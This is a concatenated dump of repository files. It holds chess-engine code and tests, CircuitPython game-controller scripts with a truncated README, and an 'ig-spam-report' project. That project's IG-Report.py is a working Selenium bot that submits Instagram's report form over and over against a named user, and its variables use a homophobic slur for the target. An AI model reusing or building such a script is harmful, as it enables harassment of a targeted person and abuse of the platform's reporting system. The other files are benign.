"text": "\"\"\"\nDefinitions of each of the different chess pieces.\n\"\"\"\n\nfrom abc import ABC, abstractmethod\n\nfrom chessington.engine.data import Player, Square\n\nclass Piece(ABC):\n \"\"\"\n An abstract base class from which all pieces inherit.\n \"\"\"\n\n def __init__(self, player):\n self.player = player\n self.moved = False\n\n @abstractmethod\n def get_available_moves(self, board):\n \"\"\"\n Get all squares that the piece is allowed to move to.\n \"\"\"\n pass\n\n def move_to(self, board, new_square):\n \"\"\"\n Move this piece to the given square on the board.\n \"\"\"\n current_square = board.find_piece(self)\n board.move_piece(current_square, new_square)\n self.moved = True\n\n def is_free(self, board, square):\n return board.squareBound(square) and \\\n (board.emptySquare(square) or self.capture_piece(board.get_piece(square)))\n\n def can_capture(self, board, square):\n return (board.squareBound(square) and\n board.fullSquare(square) and\n board.get_piece(square).player != self.player)\n\n def capture_piece(self, piece):\n return piece.player != self.player\n\n\nclass Pawn(Piece):\n \"\"\"\n A class representing a chess pawn.\n \"\"\"\n\n def get_available_moves(self, board):\n\n location = board.find_piece(self) # Finds current position of piece\n piece = 1 if self.player == Player.WHITE else -1\n single_move = Square.at(location.row + piece, location.col) # Will move one space\n double_move = Square.at(location.row + 2 * piece, location.col) # Will move 2 spaces\n\n board_moves = []\n\n if not board.squareBound(single_move) or board.fullSquare(single_move): #\n board_moves = []\n elif self.moved or not board.squareBound(double_move) or board.fullSquare(double_move):\n board_moves = [single_move]\n else:\n board_moves = [single_move, double_move]\n\n board_capture = [Square.at(location.row + piece, location.col + 1), Square.at(location.row + piece, location.col - 1)]\n board_capture = list(filter(lambda square: self.can_capture(board, square), board_capture))\n\n return board_moves + board_capture\n\n\nclass Knight(Piece):\n \"\"\"\n A class representing a chess knight.\n \"\"\"\n\n def get_available_moves(self, board):\n location = board.find_piece(self)\n knight_moves = [\n Square.at(location.row + 2, location.col + 1), Square.at(location.row + 2, location.col - 1),\n Square.at(location.row + 1, location.col + 2), Square.at(location.row + 1, location.col - 2),\n Square.at(location.row - 2, location.col + 1), Square.at(location.row - 2, location.col - 1),\n Square.at(location.row - 1, location.col + 2), Square.at(location.row - 1, location.col - 2),\n ]\n return list(filter(lambda square: self.is_free(board, square), knight_moves))\n\n\nclass Bishop(Piece):\n \"\"\"\n A class representing a chess bishop.\n \"\"\"\n\n def get_available_moves(self, board):\n return []\n\n\nclass Rook(Piece):\n \"\"\"\n A class representing a chess rook.\n \"\"\"\n\n def get_available_moves(self, board):\n return []\n\n\nclass Queen(Piece):\n \"\"\"\n A class representing a chess queen.\n \"\"\"\n\n def get_available_moves(self, board):\n return []\n\n\nclass King(Piece):\n \"\"\"\n A class representing a chess king.\n \"\"\"\n\n def get_available_moves(self, board):\n location = board.find_piece(self)\n\n king_moves = [\n Square.at(location.row + 1, location.col + 1), Square.at(location.row + 1, location.col), Square.at(location.row + 1, location.col - 1),\n Square.at(location.row, location.col + 1), Square.at(location.row, location.col - 1),\n Square.at(location.row - 1, location.col + 1), Square.at(location.row - 1, location.col), Square.at(location.row - 1, location.col - 1)\n ]\n\n return list(filter(lambda square: self.is_free(board, square), king_moves))"
},
{
"alpha_fraction": 0.5719543099403381,
"alphanum_fraction": 0.5846407413482666,
"avg_line_length": 25.01259422302246,
"blob_id": "6b4df5a7c864c0fba72892ca2bb30ffe6aece3b8",
"content_id": "5c1d8031dbbef60471760efbbd24f95db34487f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10326,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 397,
"path": "/tests/test_pieces.py",
"repo_name": "Charnub/chessington-python",
"src_encoding": "UTF-8",
"text": "from chessington.engine.board import Board\nfrom chessington.engine.data import Player, Square\nfrom chessington.engine.pieces import Pawn, Knight\n\nclass TestPawns:\n\n @staticmethod\n def test_white_pawns_can_move_up_one_square():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n square = Square.at(1, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(2, 4) in moves\n\n @staticmethod\n def test_black_pawns_can_move_down_one_square():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n square = Square.at(6, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(5, 4) in moves\n\n @staticmethod\n def test_white_pawn_can_move_up_two_squares_if_not_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n square = Square.at(1, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(3, 4) in moves\n\n @staticmethod\n def test_black_pawn_can_move_down_two_squares_if_not_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n square = Square.at(6, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 4) in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_up_two_squares_if_already_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n starting_square = Square.at(1, 4)\n board.set_piece(starting_square, pawn)\n\n intermediate_square = Square.at(2, 4)\n pawn.move_to(board, intermediate_square)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 4) not in moves\n\n @staticmethod\n def test_black_pawn_cannot_move_down_two_squares_if_already_moved():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n starting_square = Square.at(6, 4)\n board.set_piece(starting_square, pawn)\n\n intermediate_square = Square.at(5, 4)\n pawn.move_to(board, intermediate_square)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(3, 4) not in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_if_piece_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(5, 4)\n obstruction = Pawn(Player.BLACK)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_black_pawn_cannot_move_if_piece_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(3, 4)\n obstruction = Pawn(Player.WHITE)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_white_pawn_cannot_move_two_squares_if_piece_two_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(6, 4)\n obstruction = Pawn(Player.BLACK)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert obstructing_square not in moves\n\n @staticmethod\n def test_black_pawn_cannot_move_two_squares_if_piece_two_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(4, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(2, 4)\n obstruction = Pawn(Player.WHITE)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert obstructing_square not in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_two_squares_if_piece_one_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(1, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(2, 4)\n obstruction = Pawn(Player.BLACK)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(3, 4) not in moves\n\n @staticmethod\n def test_black_pawn_cannot_move_two_squares_if_piece_one_in_front():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(6, 4)\n board.set_piece(pawn_square, pawn)\n\n obstructing_square = Square.at(5, 4)\n obstruction = Pawn(Player.WHITE)\n board.set_piece(obstructing_square, obstruction)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 4) not in moves\n\n @staticmethod\n def test_white_pawn_cannot_move_at_top_of_board():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n square = Square.at(7, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_black_pawn_cannot_move_at_bottom_of_board():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n square = Square.at(0, 4)\n board.set_piece(square, pawn)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert len(moves) == 0\n\n @staticmethod\n def test_white_pawns_can_capture_diagonally():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n enemy1 = Pawn(Player.BLACK)\n enemy1_square = Square.at(4, 5)\n board.set_piece(enemy1_square, enemy1)\n\n enemy2 = Pawn(Player.BLACK)\n enemy2_square = Square.at(4, 3)\n board.set_piece(enemy2_square, enemy2)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert enemy1_square in moves\n assert enemy2_square in moves\n\n @staticmethod\n def test_black_pawns_can_capture_diagonally():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n enemy1 = Pawn(Player.WHITE)\n enemy1_square = Square.at(2, 5)\n board.set_piece(enemy1_square, enemy1)\n\n enemy2 = Pawn(Player.WHITE)\n enemy2_square = Square.at(2, 3)\n board.set_piece(enemy2_square, enemy2)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert enemy1_square in moves\n assert enemy2_square in moves\n\n @staticmethod\n def test_white_pawns_cannot_move_diagonally_except_to_capture():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.WHITE)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n friendly = Pawn(Player.WHITE)\n friendly_square = Square.at(4, 5)\n board.set_piece(friendly_square, friendly)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(4, 3) not in moves\n assert Square.at(4, 5) not in moves\n\n @staticmethod\n def test_black_pawns_can_capture_diagonally2():\n\n # Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n friendly = Pawn(Player.BLACK)\n friendly_square = Square.at(2, 5)\n board.set_piece(friendly_square, friendly)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(2, 3) not in moves\n assert Square.at(2, 5) not in moves\n\nclass TestKnight:\n\n @staticmethod\n def test_white_knight_can_move_diagonally():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.WHITE)\n square = Square.at(0, 1)\n board.set_piece(square, knight)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n assert Square.at(2, 2) in moves\n\n @staticmethod\n def test_black_knight_can_move_diagonally():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.BLACK)\n square = Square.at(7, 1)\n board.set_piece(square, knight)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n assert Square.at(5, 0) in moves\n\n @staticmethod\n def test_knight_leave_the_board():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.WHITE)\n square = Square.at(7, 7)\n board.set_piece(square, knight)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n expected_moves = [Square.at(5, 6), Square.at(6, 5)]\n assert len(moves) == len(expected_moves)\n assert sorted(moves) == sorted(expected_moves)\n\n @staticmethod\n def test_knight_capture_enemy():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.WHITE)\n square = Square.at(3, 5)\n board.set_piece(square, knight)\n\n enemy = Pawn(Player.BLACK)\n enemy_square = Square.at(1, 4)\n board.set_piece(enemy_square, enemy)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n assert enemy_square in moves"
}
] | 2 |
Anti9929/ig-spam-report
|
https://github.com/Anti9929/ig-spam-report
|
1264d14d81abf677db59b3aad2a7bc92bd423ecf
|
f19a1a4bbe8bf23c7b2377032be5d59e43dd321f
|
fa5fe2b79705c0e7bc1db5b2c6c7a93bab2ab340
|
refs/heads/main
| 2023-01-05T17:48:46.143281 | 2020-11-07T21:13:44 | 2020-11-07T21:13:44 | 315,678,967 | 1 | 0 | null | 2020-11-24T15:46:33 | 2020-11-07T21:13:46 | 2020-11-07T21:13:45 | null |
[
{
"alpha_fraction": 0.7795275449752808,
"alphanum_fraction": 0.787401556968689,
"avg_line_length": 24.399999618530273,
"blob_id": "2022c9b20ea3eadc7501aa4ee8248b00b50bf528",
"content_id": "904ed3f4210abb64f8efbfa58fd6a1c67f9324b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 5,
"path": "/README.md",
"repo_name": "Anti9929/ig-spam-report",
"src_encoding": "UTF-8",
"text": "# Description\njust a simple python script to spam report a user on instagram using selenium\n\n# How To Run\npython3 IG-Report.py\n"
},
{
"alpha_fraction": 0.569343090057373,
"alphanum_fraction": 0.6175182461738586,
"avg_line_length": 45.79069900512695,
"blob_id": "61797dddccdcf1bea4d0435d40717a967c4c4bc3",
"content_id": "92e06c6db4ae5ade50b7e34c21edec6d072eb517",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2055,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 43,
"path": "/IG-Report.py",
"repo_name": "Anti9929/ig-spam-report",
"src_encoding": "UTF-8",
"text": "import os\r\nimport time\r\nfrom selenium import webdriver as wd\r\nfrom selenium.webdriver.chrome.options import Options\r\n\r\ndef main(gayuser, gayname, delay):\r\n times_reported = 0\r\n while True:\r\n options = Options()\r\n options.headless = False\r\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\r\n driver = wd.Chrome('chromedriver.exe', options=options)\r\n\r\n driver.get('https://help.instagram.com/contact/723586364339719')\r\n driver.find_element_by_xpath('//input[@name=\"Field258021274378282\"]').send_keys(gayuser)\r\n driver.find_element_by_xpath('//input[@name=\"Field735407019826414\"]').send_keys(gayname)\r\n driver.find_element_by_xpath('//span[@class=\"_55pe\"]').click()\r\n driver.find_element_by_xpath('//ul[@class=\"_54nf\"]//a[@title=\"2008\"]').click()\r\n driver.find_element_by_xpath('//a[@class=\"_p _55pi _5vto _55_p _2agf _4o_4 _4jy0 _4jy3 _517h _51sy _42ft\"]//span[@class=\"_55pe\"]').click()\r\n driver.find_element_by_xpath('//a[@title=\"February\"]//span[@class=\"_54nh\"]').click()\r\n driver.find_element_by_xpath('//a[@class=\"_p _55pi _5vto _55_p _2agf _4o_4 _4jy0 _4jy3 _517h _51sy _42ft\"]//span[@class=\"_55pe\"]').click()\r\n driver.find_element_by_xpath('//a[@title=\"9\"]//span[@class=\"_54nh\"]').click()\r\n driver.find_element_by_xpath('//select[@id=\"294540267362199\"]//option[@value=\"Other\"]').click()\r\n driver.find_element_by_xpath('//button[@class=\"_42ft _4jy0 _4jy4 _4jy1 selected _51sy\"]').click()\r\n time.sleep(4)\r\n driver.close()\r\n times_reported += 1\r\n os.system('cls')\r\n print(f'Sent {times_reported} Reports Successfully')\r\n time.sleep(delay)\r\n\r\ndef getthegoodies():\r\n os.system('title IG Spam Report')\r\n os.system('cls')\r\n gayuser = input('Users @: ')\r\n os.system('cls')\r\n gayname = input('Users Full Name: ')\r\n os.system('cls')\r\n delay = int(input('Delay Between Reports: '))\r\n os.system('cls')\r\n main(gayuser, gayname, delay)\r\n\r\ngetthegoodies()\r\n"
}
] | 2 |
ArmaanLala/CircuitPython_games_controllers
|
https://github.com/ArmaanLala/CircuitPython_games_controllers
|
ec4bb9222c0f1be3256cac763ba98c19ded8a3ab
|
188a56d36a11044b0f9c1085e50f53f98fdfb13a
|
42762f9638921796a1240a251351bc9ec57c16a1
|
refs/heads/main
| 2023-07-21T13:26:32.611061 | 2021-09-02T11:03:38 | 2021-09-02T11:03:38 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5398625135421753,
"alphanum_fraction": 0.5807560086250305,
"avg_line_length": 23.453781127929688,
"blob_id": "24d7a2bb6feca927ca6fe65bfbf0dd3dd383c874",
"content_id": "db5496a8e8deaa0f3c4a9082546830cff8b68dc3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2910,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 119,
"path": "/experiment_2_motion/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\nfrom analogio import AnalogIn\nimport adafruit_icm20x\nimport busio\n\n#NOTE: X, Y and Z are used in a weird way. They're different for the IMU, the physical controller and the gamepad. Be Careful!\n\nimport usb_hid\nfrom gamepad import Gamepad\ngp = Gamepad(usb_hid.devices)\n\nx_in_range = 0\ny_in_range = 0\n\n\n#buttons\nbutton_pins = [board.GP20, board.GP12, board.GP13, board.GP18]\nbuttons = []\nfor pin in button_pins:\n button = DigitalInOut(pin)\n button.direction = Direction.INPUT\n button.pull = Pull.UP\n buttons.append(button)\n\nz_in = AnalogIn(board.A2)\n\nx_pins = [board.GP7, board.GP8,board.GP9, board.GP10, board.GP11]\nx_leds = []\nfor pin in x_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n x_leds.append(led)\n \ny_pins = [board.GP5, board.GP6, board.GP14, board.GP15]\ny_leds = []\nfor pin in y_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n y_leds.append(led)\n \nz_pins = [board.GP27, board.GP26, board.GP21, board.GP17, board.GP16]\nz_leds = []\nfor pin in z_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n z_leds.append(led)\n \ni2c = busio.I2C(board.GP1, board.GP0) # uses board.SCL and board.SDA\nicm = adafruit_icm20x.ICM20948(i2c)\n\nwhile True:\n y_accel = icm.acceleration[1]\n x_accel = icm.acceleration[0]\n z_val = z_in.value\n print(z_in.value)\n for led in x_leds:\n led.value = False\n \n if(y_accel) > 4:\n x_leds[0].value = True\n x_in_range = 127\n elif(y_accel) > 2:\n x_leds[1].value = True\n x_in_range = 60\n elif(y_accel) < -4:\n x_leds[4].value = True\n x_in_range = -127\n elif(y_accel) < -2:\n x_leds[3].value = True\n x_in_range = -60\n else:\n x_leds[2].value = True\n x_in_range = 0\n \n for led in y_leds:\n led.value = False\n \n if(x_accel) < - 8:\n y_leds[0].value = True\n elif(x_accel) < -6:\n y_leds[1].value = True\n elif(x_accel) > -1:\n y_leds[3].value = True\n elif(x_accel) > -3:\n y_leds[2].value = True\n\n for led in z_leds:\n led.value = False\n \n if(z_val > 62000):\n z_leds[0].value = True\n y_in_range = 127\n elif(z_val > 45000):\n z_leds[1].value = True\n y_in_Range = 60\n elif(z_val > 28000):\n z_leds[2].value = True\n y_in_range = 0\n elif(z_val > 10500):\n z_leds[3].value = True\n y_in_range = -60\n else:\n z_leds[4].value = True\n y_in_range = -127\n \n gp.move_joysticks(x=-x_in_range, y=-y_in_range)\n \n for i in range(len(buttons)):\n if(not buttons[i].value) :\n gp.press_buttons(i+1)\n else:\n gp.release_buttons(i+1)\n \n time.sleep(0.05)\n"
},
{
"alpha_fraction": 0.61774742603302,
"alphanum_fraction": 0.6505119204521179,
"avg_line_length": 23.847457885742188,
"blob_id": "fcfcfa6703defeb293c2ac8186512cf40e4bfe76",
"content_id": "80b6256136d1dd46bb746627d25dfee9ebc44a2a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1465,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 59,
"path": "/experiment_1_sliders/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom analogio import AnalogIn\nfrom digitalio import DigitalInOut, Direction, Pull\nimport touchio\nfrom board import *\n\nimport usb_hid\nfrom gamepad import Gamepad\n\ngp = Gamepad(usb_hid.devices)\n\nslider_x = AnalogIn(board.A1)\nslider_y = AnalogIn(board.A2)\n\n#want to tweak the values so it's easier to get gentle turns\n'''\ndef get_range(pin):\n return int((pin.value - 32768) / (256*2))*2\n'''\ndef get_range(pin):\n if pin.value < 32768:\n multiplier = -1\n else:\n multiplier = 1\n return int(((pin.value - 32768) / (2895))**2) * multiplier\n\nnum_buttons = 3\ntouch_pins = [GP9, GP8, GP20, GP19]\ntouch_inputs = []\nfor pin in touch_pins:\n touch_inputs.append(touchio.TouchIn(pin))\n\nbutton_pins = [GP16, GP2, GP21]\nbutton_inputs = []\nfor button in button_pins:\n button_in = DigitalInOut(button)\n button_in.direction = Direction.INPUT\n button_in.pull = Pull.UP\n button_inputs.append(button_in)\n\nwhile True:\n print(get_range(slider_x))\n print(touch_inputs[0].raw_value)\n\n gp.move_joysticks(x=get_range(slider_x), y=-get_range(slider_y))\n\n for i in range(len(button_inputs)):\n if(not button_inputs[i].value) :\n gp.press_buttons(i+1)\n else:\n gp.release_buttons(i+1)\n for i in range(len(touch_inputs)):\n if (touch_inputs[i].value):\n gp.press_buttons(i+1+num_buttons)\n else:\n gp.release_buttons(i+1+num_buttons)\n\n time.sleep(0.1)"
},
{
"alpha_fraction": 0.5500261783599854,
"alphanum_fraction": 0.5819801092147827,
"avg_line_length": 20.22222137451172,
"blob_id": "9615f2cb0d331bca149fec6abcadbcffdd750a66",
"content_id": "36a9e74d3c4003e94387e0e628d62975f5906a79",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1909,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 90,
"path": "/experiment_5_universal_flappy_bird/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom analogio import AnalogIn\nfrom digitalio import DigitalInOut, Direction, Pull\nfrom board import *\n\nimport usb_hid\nfrom gamepad import Gamepad\n\ngp = Gamepad(usb_hid.devices)\n\nbutton_x = DigitalInOut(GP17)\nbutton_x.direction = Direction.INPUT\nbutton_x.pull = Pull.UP\n\nbutton_y = DigitalInOut(GP21)\nbutton_y.direction = Direction.INPUT\nbutton_y.pull = Pull.UP\n\nbutton_1 = DigitalInOut(GP9)\nbutton_1.direction = Direction.INPUT\nbutton_1.pull = Pull.UP\n\nbutton_2 = DigitalInOut(GP13)\nbutton_2.direction = Direction.INPUT\nbutton_2.pull = Pull.UP\n\nspeed_x = -127\nspeed_y = -127\n\njump = 60\njump_back = 3\n\ncounter_x = 0\nlimit_x = 1\npressed_x = False\n\ncounter_y = 0\nlimit_y = 1\npressed_y = False\n\nwhile True:\n if (not button_x.value):\n if (not pressed_x):\n speed_x = speed_x + jump\n if speed_x > 127:\n speed_x = 127\n pressed_x = True\n\n if (button_x.value or pressed_x):\n if (button_x.value):\n pressed_x = False\n counter_x = counter_x + 1\n if counter_x > limit_x:\n speed_x = speed_x-jump_back\n if speed_x < -127:\n speed_x = -127\n\n if (not button_y.value):\n if (not pressed_y):\n speed_y = speed_y + jump\n if speed_y > 127:\n speed_y = 127\n pressed_y = True\n\n if (button_y.value or pressed_y):\n if (button_y.value):\n pressed_y = False\n counter_y = counter_y + 1\n if counter_y > limit_y:\n speed_y = speed_y-jump_back\n if speed_y < -127:\n speed_y = -127\n\n gp.move_joysticks(x=speed_x, y=speed_y)\n\n if(not button_1.value):\n gp.press_buttons(1)\n else:\n gp.release_buttons(1)\n\n if(not button_2.value):\n gp.press_buttons(2)\n else:\n gp.release_buttons(2)\n\n print(speed_x, speed_y)\n\n\n time.sleep(0.01)"
},
{
"alpha_fraction": 0.605011522769928,
"alphanum_fraction": 0.6353445649147034,
"avg_line_length": 25.15517234802246,
"blob_id": "c8efc0630d8e84b1ac542da3924b26b1bcbc3e53",
"content_id": "209935e416e096e3116df87e5aecc9e29833a022",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3033,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 116,
"path": "/experiment_4_spinning_chair/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\nfrom analogio import AnalogIn\nimport adafruit_icm20x\nimport busio\nimport math\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\nfrom adafruit_hid.keycode import Keycode\n\nkeyboard = Keyboard(usb_hid.devices)\nkeyboard_layout = KeyboardLayoutUS(keyboard)\n\nx_min = -12\nx_max = 40\n\ny_min = -5\ny_max = 40\n\n#stolen from https://learn.adafruit.com/circuit-playground-express-compass/circuitpython\ndef normalize(value, in_min, in_max):\n mapped = (value - in_min) * 200 / (in_max - in_min) + -100\n return max(min(mapped, 100), -100)\n\ni2c = busio.I2C(board.GP1, board.GP0) # uses board.SCL and board.SDA\nicm = adafruit_icm20x.ICM20948(i2c)\n\n#buttons\nbutton_pins = [board.GP20, board.GP12, board.GP13, board.GP18]\nbuttons = []\nfor pin in button_pins:\n button = DigitalInOut(pin)\n button.direction = Direction.INPUT\n button.pull = Pull.UP\n buttons.append(button)\n\nz_in = AnalogIn(board.A2)\n\nz_pins = [board.GP27, board.GP26, board.GP21, board.GP17, board.GP16]\nz_leds = []\nfor pin in z_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n z_leds.append(led)\n\ndef get_degree():\n value = icm.gyro[2]\n if (value < 0):\n return math.ceil(value)\n if (value >= 0):\n return math.floor(value)\n\ndirection = 0\nlast_direction = 0\nlast_spin = 0\nwhile True:\n z_val = z_in.value\n spin = get_degree()\n\n if spin < 0:\n #turn right\n if last_spin < 0:\n pass\n #continue spinning\n else:\n #start spinning\n keyboard.press(Keycode.RIGHT_ARROW)\n keyboard.release(Keycode.LEFT_ARROW)\n\n if spin > 0:\n #turn left\n if last_spin > 0:\n pass\n #continue spinning\n else:\n #start spinning\n keyboard.press(Keycode.LEFT_ARROW)\n keyboard.release(Keycode.RIGHT_ARROW)\n if spin == 0:\n keyboard.release(Keycode.LEFT_ARROW)\n keyboard.release(Keycode.RIGHT_ARROW)\n\n for led in z_leds:\n led.value = False\n\n if(z_val > 62000):\n z_leds[0].value = True\n keyboard.press(Keycode.UP_ARROW)\n keyboard.release(Keycode.DOWN_ARROW)\n elif(z_val > 45000):\n z_leds[1].value = True\n keyboard.press(Keycode.UP_ARROW)\n keyboard.release(Keycode.DOWN_ARROW)\n elif(z_val > 28000):\n z_leds[2].value = True\n keyboard.release(Keycode.UP_ARROW)\n keyboard.release(Keycode.DOWN_ARROW)\n elif(z_val > 10500):\n z_leds[3].value = True\n keyboard.release(Keycode.UP_ARROW)\n keyboard.press(Keycode.DOWN_ARROW)\n else:\n z_leds[4].value = True\n keyboard.release(Keycode.UP_ARROW)\n keyboard.press(Keycode.DOWN_ARROW)\n\n if buttons[2].value == False:\n keyboard.press(Keycode.ENTER)\n print(\"enter\")\n else:\n keyboard.release(Keycode.ENTER)\n\n time.sleep(0.05)"
},
{
"alpha_fraction": 0.7555474638938904,
"alphanum_fraction": 0.7631866335868835,
"avg_line_length": 73.24324035644531,
"blob_id": "efe923acb1dd9c94511bfe5b505051f2ce132fdd",
"content_id": "6a77b33255c65a27234b996bd95d799d0ef4008d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2749,
"license_type": "permissive",
"max_line_length": 454,
"num_lines": 37,
"path": "/README.md",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "# Homebrew games controllers\nI've been playing with home-made games controllers for a while now. Probably too much. \nMostly because I think that the 'joypad' style design is uninspired and there are much better options possible. This is my attempt to find a more fun way of playing games.\n\nI haven't done any schematics because I free-hand the circuits and make them up as I go along. That said, there're very simple and you should be able to infer them from the code.\n\nI got a bunch of protoboard in the shape of gamepads made up. This includes a spot to solder a Pico. Version 1 also had space for two stemma QT connectos , \nbut these proved to be more complex than they're worth so I haven't actually used them. If I make a version 2, I'll drop these.\n\n## Hardware\nIn the hardware folder you'll find easyEDA design files and Gerbers (for fabrication) for version 1 of the controller. There are a bunch of things I'm unhappy with on this, but it works!\n\n## Experiment 1\nSlide potentiometers!\nThe slides used have a 'stick point' in the middle. This makes it easy to use, but takes a bit of a push to get over this lump. It makes it a bit janky to play.\n\nI'm particularly enjoying the micro switches on the sholders though. This is definately a feature I'd like to continue.\n\n[](https://www.youtube.com/watch?v=RL6uFd8PuKk)\n\n(click to open YouTube video)\n\n## Experiment 2\nIMU -- this contains a vastly overkill nine-axis IMU that can be used as an analogue input. In the initial version, it's only used to control the X axis (a bit like a steering wheel). There's also a slider becuase I enjoyed the slider for throttle control. This time, I've gone with a smooth slider (no 'bump' in the middle, but added some 